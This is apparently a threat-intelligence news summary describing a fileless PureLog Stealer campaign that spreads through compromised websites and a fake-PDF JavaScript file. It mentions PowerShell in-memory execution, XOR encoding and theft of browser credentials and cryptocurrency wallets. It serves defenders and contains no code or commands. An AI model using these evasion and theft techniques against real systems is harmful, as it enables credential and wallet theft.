Gbhackers
Fileless PureLog Stealer Campaign Exploits Compromised Websites
Ask AI about this cluster
Analyzing cluster data...
Referenced clusters:
Something went wrong. Please try again.
Cluster AI
Ask questions about this threat cluster with AI-powered analysis.
Get Researcher $29.99/moArticle Content
A sophisticated cyber campaign is leveraging compromised websites and a malicious JavaScript file named transcript.pdf.js to deploy PureLog Stealer, a .NET-based infostealer. The attack uses a fileless infection method, primarily through PowerShell and trusted Google Blogspot infrastructure, to execute payloads in memory, leaving minimal traces on disk. Victims are tricked into opening a file that appears to be a PDF, which actually executes a script to download the malware. PureLog Stealer targets major web browsers and cryptocurrency wallets, stealing sensitive data such as credentials, cookies, and autofill information. The campaign employs advanced evasion techniques, including XOR encoding and the use of legitimate Microsoft binaries to blend malicious activities with normal operations. This approach complicates detection and response efforts for security teams. Securonix has identified the framework as Veil#Drop, emphasizing the need for vigilance against such stealthy attacks.
Key Points: • PureLog Stealer uses a fileless infection method, executing entirely in memory. • The attack vector involves a malicious JavaScript file disguised as a PDF. • Stolen data includes browser credentials and cryptocurrency wallet information.